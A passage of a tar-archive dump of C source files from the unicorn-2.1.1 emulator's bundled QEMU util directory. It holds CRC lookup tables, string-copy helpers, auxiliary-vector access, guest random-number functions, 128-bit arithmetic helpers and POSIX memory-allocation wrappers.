0xAA64D611L, 0x580F5512L, 0x4B5FA6E6L, 0xB93425E5L, 0x6DFE410EL, 0x9F95C20DL, 0x8CC531F9L, 0x7EAEB2FAL, 0x30E349B1L, 0xC288CAB2L, 0xD1D83946L, 0x23B3BA45L, 0xF779DEAEL, 0x05125DADL, 0x1642AE59L, 0xE4292D5AL, 0xBA3A117EL, 0x4851927DL, 0x5B016189L, 0xA96AE28AL, 0x7DA08661L, 0x8FCB0562L, 0x9C9BF696L, 0x6EF07595L, 0x417B1DBCL, 0xB3109EBFL, 0xA0406D4BL, 0x522BEE48L, 0x86E18AA3L, 0x748A09A0L, 0x67DAFA54L, 0x95B17957L, 0xCBA24573L, 0x39C9C670L, 0x2A993584L, 0xD8F2B687L, 0x0C38D26CL, 0xFE53516FL, 0xED03A29BL, 0x1F682198L, 0x5125DAD3L, 0xA34E59D0L, 0xB01EAA24L, 0x42752927L, 0x96BF4DCCL, 0x64D4CECFL, 0x77843D3BL, 0x85EFBE38L, 0xDBFC821CL, 0x2997011FL, 0x3AC7F2EBL, 0xC8AC71E8L, 0x1C661503L, 0xEE0D9600L, 0xFD5D65F4L, 0x0F36E6F7L, 0x61C69362L, 0x93AD1061L, 0x80FDE395L, 0x72966096L, 0xA65C047DL, 0x5437877EL, 0x4767748AL, 0xB50CF789L, 0xEB1FCBADL, 0x197448AEL, 0x0A24BB5AL, 0xF84F3859L, 0x2C855CB2L, 0xDEEEDFB1L, 0xCDBE2C45L, 0x3FD5AF46L, 0x7198540DL, 0x83F3D70EL, 0x90A324FAL, 0x62C8A7F9L, 0xB602C312L, 0x44694011L, 0x5739B3E5L, 0xA55230E6L, 0xFB410CC2L, 0x092A8FC1L, 0x1A7A7C35L, 0xE811FF36L, 0x3CDB9BDDL, 0xCEB018DEL, 0xDDE0EB2AL, 0x2F8B6829L, 0x82F63B78L, 0x709DB87BL, 0x63CD4B8FL, 0x91A6C88CL, 0x456CAC67L, 0xB7072F64L, 0xA457DC90L, 0x563C5F93L, 0x082F63B7L, 0xFA44E0B4L, 0xE9141340L, 0x1B7F9043L, 0xCFB5F4A8L, 0x3DDE77ABL, 0x2E8E845FL, 0xDCE5075CL, 0x92A8FC17L, 0x60C37F14L, 0x73938CE0L, 0x81F80FE3L, 0x55326B08L, 0xA759E80BL, 0xB4091BFFL, 0x466298FCL, 0x1871A4D8L, 0xEA1A27DBL, 0xF94AD42FL, 0x0B21572CL, 0xDFEB33C7L, 0x2D80B0C4L, 0x3ED04330L, 0xCCBBC033L, 0xA24BB5A6L, 0x502036A5L, 0x4370C551L, 0xB11B4652L, 0x65D122B9L, 0x97BAA1BAL, 0x84EA524EL, 0x7681D14DL, 0x2892ED69L, 0xDAF96E6AL, 0xC9A99D9EL, 0x3BC21E9DL, 0xEF087A76L, 0x1D63F975L, 0x0E330A81L, 0xFC588982L, 0xB21572C9L, 0x407EF1CAL, 0x532E023EL, 0xA145813DL, 0x758FE5D6L, 0x87E466D5L, 0x94B49521L, 0x66DF1622L, 0x38CC2A06L, 0xCAA7A905L, 0xD9F75AF1L, 0x2B9CD9F2L, 0xFF56BD19L, 0x0D3D3E1AL, 0x1E6DCDEEL, 0xEC064EEDL, 0xC38D26C4L, 0x31E6A5C7L, 0x22B65633L, 0xD0DDD530L, 0x0417B1DBL, 0xF67C32D8L, 0xE52CC12CL, 0x1747422FL, 0x49547E0BL, 0xBB3FFD08L, 0xA86F0EFCL, 0x5A048DFFL, 0x8ECEE914L, 0x7CA56A17L, 0x6FF599E3L, 0x9D9E1AE0L, 0xD3D3E1ABL, 0x21B862A8L, 0x32E8915CL, 0xC083125FL, 0x144976B4L, 0xE622F5B7L, 0xF5720643L, 0x07198540L, 0x590AB964L, 0xAB613A67L, 0xB831C993L, 0x4A5A4A90L, 0x9E902E7BL, 0x6CFBAD78L, 0x7FAB5E8CL, 0x8DC0DD8FL, 0xE330A81AL, 0x115B2B19L, 0x020BD8EDL, 0xF0605BEEL, 0x24AA3F05L, 0xD6C1BC06L, 0xC5914FF2L, 0x37FACCF1L, 0x69E9F0D5L, 0x9B8273D6L, 0x88D28022L, 0x7AB90321L, 0xAE7367CAL, 0x5C18E4C9L, 0x4F48173DL, 0xBD23943EL, 0xF36E6F75L, 0x0105EC76L, 0x12551F82L, 0xE03E9C81L, 0x34F4F86AL, 0xC69F7B69L, 0xD5CF889DL, 0x27A40B9EL, 0x79B737BAL, 0x8BDCB4B9L, 0x988C474DL, 0x6AE7C44EL, 0xBE2DA0A5L, 0x4C4623A6L, 0x5F16D052L, 0xAD7D5351L }; uint32_t crc32c(uint32_t crc, const uint8_t *data, unsigned int length) { while (length--) { crc = crc32c_table[(crc ^ *data++) & 0xFFL] ^ (crc >> 8); } return crc^0xffffffff; } /* * This is the CRC-32 table * Generated with: * width = 32 bits * poly = 0xEDB88320 */ static const uint32_t crc32_table[256] = { 0x00000000U, 0x77073096U, 0xEE0E612CU, 0x990951BAU, 0x076DC419U, 0x706AF48FU, 0xE963A535U, 0x9E6495A3U, 0x0EDB8832U, 0x79DCB8A4U, 0xE0D5E91EU, 0x97D2D988U, 0x09B64C2BU, 0x7EB17CBDU, 0xE7B82D07U, 0x90BF1D91U, 0x1DB71064U, 0x6AB020F2U, 0xF3B97148U, 0x84BE41DEU, 0x1ADAD47DU, 0x6DDDE4EBU, 0xF4D4B551U, 0x83D385C7U, 0x136C9856U, 0x646BA8C0U, 0xFD62F97AU, 0x8A65C9ECU, 0x14015C4FU, 0x63066CD9U, 0xFA0F3D63U, 0x8D080DF5U, 0x3B6E20C8U, 0x4C69105EU, 0xD56041E4U, 0xA2677172U, 0x3C03E4D1U, 0x4B04D447U, 0xD20D85FDU, 0xA50AB56BU, 0x35B5A8FAU, 0x42B2986CU, 0xDBBBC9D6U, 0xACBCF940U, 0x32D86CE3U, 0x45DF5C75U, 0xDCD60DCFU, 0xABD13D59U, 0x26D930ACU, 0x51DE003AU, 0xC8D75180U, 0xBFD06116U, 0x21B4F4B5U, 0x56B3C423U, 0xCFBA9599U, 0xB8BDA50FU, 0x2802B89EU, 0x5F058808U, 0xC60CD9B2U, 0xB10BE924U, 0x2F6F7C87U, 0x58684C11U, 0xC1611DABU, 0xB6662D3DU, 0x76DC4190U, 0x01DB7106U, 0x98D220BCU, 0xEFD5102AU, 0x71B18589U, 0x06B6B51FU, 0x9FBFE4A5U, 0xE8B8D433U, 0x7807C9A2U, 0x0F00F934U, 0x9609A88EU, 0xE10E9818U, 0x7F6A0DBBU, 0x086D3D2DU, 0x91646C97U, 0xE6635C01U, 0x6B6B51F4U, 0x1C6C6162U, 0x856530D8U, 0xF262004EU, 0x6C0695EDU, 0x1B01A57BU, 0x8208F4C1U, 0xF50FC457U, 0x65B0D9C6U, 0x12B7E950U, 0x8BBEB8EAU, 0xFCB9887CU, 0x62DD1DDFU, 0x15DA2D49U, 0x8CD37CF3U, 0xFBD44C65U, 0x4DB26158U, 0x3AB551CEU, 0xA3BC0074U, 0xD4BB30E2U, 0x4ADFA541U, 0x3DD895D7U, 0xA4D1C46DU, 0xD3D6F4FBU, 0x4369E96AU, 0x346ED9FCU, 0xAD678846U, 0xDA60B8D0U, 0x44042D73U, 0x33031DE5U, 0xAA0A4C5FU, 0xDD0D7CC9U, 0x5005713CU, 0x270241AAU, 0xBE0B1010U, 0xC90C2086U, 0x5768B525U, 0x206F85B3U, 0xB966D409U, 0xCE61E49FU, 0x5EDEF90EU, 0x29D9C998U, 0xB0D09822U, 0xC7D7A8B4U, 0x59B33D17U, 0x2EB40D81U, 0xB7BD5C3BU, 0xC0BA6CADU, 0xEDB88320U, 0x9ABFB3B6U, 0x03B6E20CU, 0x74B1D29AU, 0xEAD54739U, 0x9DD277AFU, 0x04DB2615U, 0x73DC1683U, 0xE3630B12U, 0x94643B84U, 0x0D6D6A3EU, 0x7A6A5AA8U, 0xE40ECF0BU, 0x9309FF9DU, 0x0A00AE27U, 0x7D079EB1U, 0xF00F9344U, 0x8708A3D2U, 0x1E01F268U, 0x6906C2FEU, 0xF762575DU, 0x806567CBU, 0x196C3671U, 0x6E6B06E7U, 0xFED41B76U, 0x89D32BE0U, 0x10DA7A5AU, 0x67DD4ACCU, 0xF9B9DF6FU, 0x8EBEEFF9U, 0x17B7BE43U, 0x60B08ED5U, 0xD6D6A3E8U, 0xA1D1937EU, 0x38D8C2C4U, 0x4FDFF252U, 0xD1BB67F1U, 0xA6BC5767U, 0x3FB506DDU, 0x48B2364BU, 0xD80D2BDAU, 0xAF0A1B4CU, 0x36034AF6U, 0x41047A60U, 0xDF60EFC3U, 0xA867DF55U, 0x316E8EEFU, 0x4669BE79U, 0xCB61B38CU, 0xBC66831AU, 0x256FD2A0U, 0x5268E236U, 0xCC0C7795U, 0xBB0B4703U, 0x220216B9U, 0x5505262FU, 0xC5BA3BBEU, 0xB2BD0B28U, 0x2BB45A92U, 0x5CB36A04U, 0xC2D7FFA7U, 0xB5D0CF31U, 0x2CD99E8BU, 0x5BDEAE1DU, 0x9B64C2B0U, 0xEC63F226U, 0x756AA39CU, 0x026D930AU, 0x9C0906A9U, 0xEB0E363FU, 0x72076785U, 0x05005713U, 0x95BF4A82U, 0xE2B87A14U, 0x7BB12BAEU, 0x0CB61B38U, 0x92D28E9BU, 0xE5D5BE0DU, 0x7CDCEFB7U, 0x0BDBDF21U, 0x86D3D2D4U, 0xF1D4E242U, 0x68DDB3F8U, 0x1FDA836EU, 0x81BE16CDU, 0xF6B9265BU, 0x6FB077E1U, 0x18B74777U, 0x88085AE6U, 0xFF0F6A70U, 0x66063BCAU, 0x11010B5CU, 0x8F659EFFU, 0xF862AE69U, 0x616BFFD3U, 0x166CCF45U, 0xA00AE278U, 0xD70DD2EEU, 0x4E048354U, 0x3903B3C2U, 0xA7672661U, 0xD06016F7U, 0x4969474DU, 0x3E6E77DBU, 0xAED16A4AU, 0xD9D65ADCU, 0x40DF0B66U, 0x37D83BF0U, 0xA9BCAE53U, 0xDEBB9EC5U, 0x47B2CF7FU, 0x30B5FFE9U, 0xBDBDF21CU, 0xCABAC28AU, 0x53B39330U, 0x24B4A3A6U, 0xBAD03605U, 0xCDD70693U, 0x54DE5729U, 0x23D967BFU, 0xB3667A2EU, 0xC4614AB8U, 0x5D681B02U, 0x2A6F2B94U, 0xB40BBE37U, 0xC30C8EA1U, 0x5A05DF1BU, 0x2D02EF8DU, }; uint32_t crc32(uint32_t crc, const uint8_t *data, unsigned int length) { int i; crc = ~crc; for (i = 0; i < length; i++) { crc = (crc >> 8) ^ crc32_table[(crc ^ data[i]) & 0xff]; } return ~crc; } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/util/cutils.c��������������������������������������������������������������������0000664�0000000�0000000�00000003243�14675241067�0016601�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Simple C functions to supplement the C library * * Copyright (c) 2006 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #include <string.h> #include "qemu/cutils.h" void pstrcpy(char *buf, int buf_size, const char *str) { int c; char *q = buf; if (buf_size <= 0) return; for(;;) { c = *str++; if (c == 0 || q >= buf + buf_size - 1) break; *q++ = c; } *q = '\0'; } /* strcat and truncate. */ char *pstrcat(char *buf, int buf_size, const char *s) { int len; len = strlen(buf); if (len < buf_size) pstrcpy(buf + len, buf_size - len, s); return buf; } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/util/getauxval.c�����������������������������������������������������������������0000664�0000000�0000000�00000006200�14675241067�0017272�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU access to the auxiliary vector * * Copyright (C) 2013 Red Hat, Inc * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #include "qemu/osdep.h" #ifdef CONFIG_GETAUXVAL /* Don't inline this in qemu/osdep.h, because pulling in <sys/auxv.h> for the system declaration of getauxval pulls in the system <elf.h>, which conflicts with qemu's version. */ #include <sys/auxv.h> unsigned long qemu_getauxval(unsigned long key) { return getauxval(key); } #elif defined(__linux__) #include "elf.h" /* Our elf.h doesn't contain Elf32_auxv_t and Elf64_auxv_t, which is ok because that just makes it easier to define it properly for the host here. */ typedef struct { unsigned long a_type; unsigned long a_val; } ElfW_auxv_t; static const ElfW_auxv_t *auxv; static const ElfW_auxv_t *qemu_init_auxval(void) { ElfW_auxv_t *a; ssize_t size = 512, r, ofs; int fd; /* Allocate some initial storage. Make sure the first entry is set to end-of-list, so that we've got a valid list in case of error. */ auxv = a = g_malloc(size); a[0].a_type = 0; a[0].a_val = 0; fd = open("/proc/self/auxv", O_RDONLY); if (fd < 0) { return a; } /* Read the first SIZE bytes. Hopefully, this covers everything. */ r = read(fd, a, size); if (r == size) { /* Continue to expand until we do get a partial read. */ do { ofs = size; size *= 2; auxv = a = g_realloc(a, size); r = read(fd, (char *)a + ofs, ofs); } while (r == ofs); } close(fd); return a; } unsigned long qemu_getauxval(unsigned long type) { const ElfW_auxv_t *a = auxv; if (unlikely(a == NULL)) { a = qemu_init_auxval(); } for (; a->a_type != 0; a++) { if (a->a_type == type) { return a->a_val; } } return 0; } #elif defined(__FreeBSD__) #include <sys/auxv.h> unsigned long qemu_getauxval(unsigned long type) { unsigned long aux = 0; elf_aux_info(type, &aux, sizeof(aux)); return aux; } #else unsigned long qemu_getauxval(unsigned long type) { return 0; } #endif ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/util/guest-random.c��������������������������������������������������������������0000664�0000000�0000000�00000003433�14675241067�0017704�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU guest-visible random functions * * Copyright 2019 Linaro, Ltd. * * This program is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License as published by the Free * Software Foundation; either version 2 of the License, or (at your option) * any later version. */ #include "qemu/osdep.h" #include "qemu/cutils.h" //#include "qapi/error.h" #include "qemu/guest-random.h" #include "crypto/random.h" //#include "sysemu/replay.h" #ifndef _MSC_VER static __thread GRand *thread_rand; #endif static bool deterministic = true; static int glib_random_bytes(void *buf, size_t len) { #ifndef _MSC_VER GRand *rand = thread_rand; size_t i; uint32_t x; if (unlikely(rand == NULL)) { /* Thread not initialized for a cpu, or main w/o -seed. */ thread_rand = rand = g_rand_new(); } for (i = 0; i + 4 <= len; i += 4) { x = g_rand_int(rand); __builtin_memcpy(buf + i, &x, 4); } if (i < len) { x = g_rand_int(rand); __builtin_memcpy(buf + i, &x, i - len); } #endif return 0; } int qemu_guest_getrandom(void *buf, size_t len) { return glib_random_bytes(buf, len); } void qemu_guest_getrandom_nofail(void *buf, size_t len) { (void)qemu_guest_getrandom(buf, len); } uint64_t qemu_guest_random_seed_thread_part1(void) { if (deterministic) { uint64_t ret; glib_random_bytes(&ret, sizeof(ret)); return ret; } return 0; } void qemu_guest_random_seed_thread_part2(uint64_t seed) { #ifndef _MSC_VER g_assert(thread_rand == NULL); if (deterministic) { thread_rand = g_rand_new_with_seed_array((const guint32 *)&seed, sizeof(seed) / sizeof(guint32)); } #endif } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/util/host-utils.c����������������������������������������������������������������0000664�0000000�0000000�00000013617�14675241067�0017417�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Utility compute operations used by translated code. * * Copyright (c) 2003 Fabrice Bellard * Copyright (c) 2007 Aurelien Jarno * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #include "qemu/osdep.h" #include "qemu/host-utils.h" #ifndef CONFIG_INT128 /* Long integer helpers */ static inline void mul64(uint64_t *plow, uint64_t *phigh, uint64_t a, uint64_t b) { typedef union { uint64_t ll; struct { #ifdef HOST_WORDS_BIGENDIAN uint32_t high, low; #else uint32_t low, high; #endif } l; } LL; LL rl, rm, rn, rh, a0, b0; uint64_t c; a0.ll = a; b0.ll = b; rl.ll = (uint64_t)a0.l.low * b0.l.low; rm.ll = (uint64_t)a0.l.low * b0.l.high; rn.ll = (uint64_t)a0.l.high * b0.l.low; rh.ll = (uint64_t)a0.l.high * b0.l.high; c = (uint64_t)rl.l.high + rm.l.low + rn.l.low; rl.l.high = c; c >>= 32; c = c + rm.l.high + rn.l.high + rh.l.low; rh.l.low = c; rh.l.high += (uint32_t)(c >> 32); *plow = rl.ll; *phigh = rh.ll; } /* Unsigned 64x64 -> 128 multiplication */ void mulu64 (uint64_t *plow, uint64_t *phigh, uint64_t a, uint64_t b) { mul64(plow, phigh, a, b); } /* Signed 64x64 -> 128 multiplication */ void muls64 (uint64_t *plow, uint64_t *phigh, int64_t a, int64_t b) { uint64_t rh; mul64(plow, &rh, a, b); /* Adjust for signs. */ if (b < 0) { rh -= a; } if (a < 0) { rh -= b; } *phigh = rh; } /* Unsigned 128x64 division. Returns 1 if overflow (divide by zero or */ /* quotient exceeds 64 bits). Otherwise returns quotient via plow and */ /* remainder via phigh. */ int divu128(uint64_t *plow, uint64_t *phigh, uint64_t divisor) { uint64_t dhi = *phigh; uint64_t dlo = *plow; unsigned i; uint64_t carry = 0; if (divisor == 0) { return 1; } else if (dhi == 0) { *plow = dlo / divisor; *phigh = dlo % divisor; return 0; } else if (dhi > divisor) { return 1; } else { for (i = 0; i < 64; i++) { carry = dhi >> 63; dhi = (dhi << 1) | (dlo >> 63); if (carry || (dhi >= divisor)) { dhi -= divisor; carry = 1; } else { carry = 0; } dlo = (dlo << 1) | carry; } *plow = dlo; *phigh = dhi; return 0; } } int divs128(int64_t *plow, int64_t *phigh, int64_t divisor) { int sgn_dvdnd = *phigh < 0; int sgn_divsr = divisor < 0; int overflow = 0; if (sgn_dvdnd) { *plow = ~(*plow); *phigh = ~(*phigh); if (*plow == (int64_t)-1) { *plow = 0; (*phigh)++; } else { (*plow)++; } } if (sgn_divsr) { divisor = 0 - divisor; } overflow = divu128((uint64_t *)plow, (uint64_t *)phigh, (uint64_t)divisor); if (sgn_dvdnd ^ sgn_divsr) { *plow = 0 - *plow; } if (!overflow) { if ((*plow < 0) ^ (sgn_dvdnd ^ sgn_divsr)) { overflow = 1; } } return overflow; } #endif /** * urshift - 128-bit Unsigned Right Shift. * @plow: in/out - lower 64-bit integer. * @phigh: in/out - higher 64-bit integer. * @shift: in - bytes to shift, between 0 and 127. * * Result is zero-extended and stored in plow/phigh, which are * input/output variables. Shift values outside the range will * be mod to 128. In other words, the caller is responsible to * verify/assert both the shift range and plow/phigh pointers. */ void urshift(uint64_t *plow, uint64_t *phigh, int32_t shift) { shift &= 127; if (shift == 0) { return; } uint64_t h = *phigh >> (shift & 63); if (shift >= 64) { *plow = h; *phigh = 0; } else { *plow = (*plow >> (shift & 63)) | (*phigh << (64 - (shift & 63))); *phigh = h; } } /** * ulshift - 128-bit Unsigned Left Shift. * @plow: in/out - lower 64-bit integer. * @phigh: in/out - higher 64-bit integer. * @shift: in - bytes to shift, between 0 and 127. * @overflow: out - true if any 1-bit is shifted out. * * Result is zero-extended and stored in plow/phigh, which are * input/output variables. Shift values outside the range will * be mod to 128. In other words, the caller is responsible to * verify/assert both the shift range and plow/phigh pointers. */ void ulshift(uint64_t *plow, uint64_t *phigh, int32_t shift, bool *overflow) { uint64_t low = *plow; uint64_t high = *phigh; shift &= 127; if (shift == 0) { return; } /* check if any bit will be shifted out */ urshift(&low, &high, 128 - shift); if (low | high) { *overflow = true; } if (shift >= 64) { *phigh = *plow << (shift & 63); *plow = 0; } else { *phigh = (*plow >> (64 - (shift & 63))) | (*phigh << (shift & 63)); *plow = *plow << shift; } } �����������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/util/osdep.c���������������������������������������������������������������������0000664�0000000�0000000�00000005321�14675241067�0016407�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU low level functions * * Copyright (c) 2003 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #include "qemu/osdep.h" /* Needed early for CONFIG_BSD etc. */ #ifdef CONFIG_SOLARIS #include <sys/statvfs.h> /* See MySQL bug #7156 (http://bugs.mysql.com/bug.php?id=7156) for discussion about Solaris header problems */ extern int madvise(char *, size_t, int); #endif #include "qemu-common.h" #include "qemu/cutils.h" int qemu_madvise(void *addr, size_t len, int advice) { if (advice == QEMU_MADV_INVALID) { errno = EINVAL; return -1; } #if defined(CONFIG_MADVISE) return madvise(addr, len, advice); #elif defined(CONFIG_POSIX_MADVISE) return posix_madvise(addr, len, advice); #else errno = EINVAL; return -1; #endif } static int qemu_mprotect__osdep(void *addr, size_t size, int prot) { #ifdef _WIN32 DWORD old_protect; if (!VirtualProtect(addr, size, prot, &old_protect)) { // g_autofree gchar *emsg = g_win32_error_message(GetLastError()); // error_report("%s: VirtualProtect failed: %s", __func__, emsg); return -1; } return 0; #else if (mprotect(addr, size, prot)) { // error_report("%s: mprotect failed: %s", __func__, strerror(errno)); return -1; } return 0; #endif } int qemu_mprotect_rwx(void *addr, size_t size) { #ifdef _WIN32 return qemu_mprotect__osdep(addr, size, PAGE_EXECUTE_READWRITE); #else return qemu_mprotect__osdep(addr, size, PROT_READ | PROT_WRITE | PROT_EXEC); #endif } int qemu_mprotect_none(void *addr, size_t size) { #ifdef _WIN32 return qemu_mprotect__osdep(addr, size, PAGE_NOACCESS); #else return qemu_mprotect__osdep(addr, size, PROT_NONE); #endif } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/util/oslib-posix.c���������������������������������������������������������������0000664�0000000�0000000�00000016323�14675241067�0017551�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * os-posix-lib.c * * Copyright (c) 2003-2008 Fabrice Bellard * Copyright (c) 2010 Red Hat, Inc. * * QEMU library functions on POSIX which are shared between QEMU and * the QEMU tools. * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #include <uc_priv.h> #include "qemu/osdep.h" #ifdef CONFIG_LINUX #include <linux/mman.h> #else /* !CONFIG_LINUX */ #define MAP_SYNC 0x0 #define MAP_SHARED_VALIDATE 0x0 #endif /* CONFIG_LINUX */ #ifndef __MINGW32__ static void *qemu_ram_mmap(struct uc_struct *uc, size_t size, size_t align, bool shared); static void qemu_ram_munmap(struct uc_struct *uc, void *ptr, size_t size); #endif #if defined(__MINGW32__) && defined(__clang__) #include <windows.h> int getpagesize() { SYSTEM_INFO S; GetNativeSystemInfo(&S); return S.dwPageSize; } #endif void *qemu_oom_check(void *ptr) { if (ptr == NULL) { fprintf(stderr, "Failed to allocate memory: %s\n", strerror(errno)); abort(); } return ptr; } void *qemu_try_memalign(size_t alignment, size_t size) { void *ptr; if (alignment < sizeof(void*)) { alignment = sizeof(void*); } #if defined(CONFIG_POSIX_MEMALIGN) int ret; ret = posix_memalign(&ptr, alignment, size); if (ret != 0) { errno = ret; ptr = NULL; } #elif defined(CONFIG_BSD) ptr = valloc(size); #elif defined(__MINGW32__) ptr = __mingw_aligned_malloc(size, alignment); #else ptr = memalign(alignment, size); #endif //trace_qemu_memalign(alignment, size, ptr); return ptr; } void *qemu_memalign(size_t alignment, size_t size) { return qemu_oom_check(qemu_try_memalign(alignment, size)); } #ifdef __MINGW32__ static int get_allocation_granularity(void) { SYSTEM_INFO system_info; GetSystemInfo(&system_info); return system_info.dwAllocationGranularity; } #endif /* alloc shared memory pages */ void *qemu_anon_ram_alloc(struct uc_struct *uc, size_t size, uint64_t *alignment) { #ifdef __MINGW32__ void *ptr; ptr = VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_READWRITE); // trace_qemu_anon_ram_alloc(size, ptr); if (ptr && alignment) { *alignment = MAX(get_allocation_granularity(), getpagesize()); } return ptr; #else size_t align = QEMU_VMALLOC_ALIGN; void *ptr = qemu_ram_mmap(uc, size, align, false); if (ptr == MAP_FAILED) { return NULL; } if (alignment) { *alignment = align; } //trace_qemu_anon_ram_alloc(size, ptr); return ptr; #endif } void qemu_vfree(void *ptr) { #ifdef __MINGW32__ if (ptr) { __mingw_aligned_free(ptr); } #else //trace_qemu_vfree(ptr); free(ptr); #endif } void qemu_anon_ram_free(struct uc_struct *uc, void *ptr, size_t size) { #ifdef __MINGW32__ if (ptr) { VirtualFree(ptr, 0, MEM_RELEASE); } #else //trace_qemu_anon_ram_free(ptr, size); qemu_ram_munmap(uc, ptr, size); #endif } #if defined(__powerpc64__) && defined(__linux__) static size_t qemu_fd_getpagesize(struct uc_struct *uc) { #ifdef CONFIG_LINUX #ifdef __sparc__ /* SPARC Linux needs greater alignment than the pagesize */ return 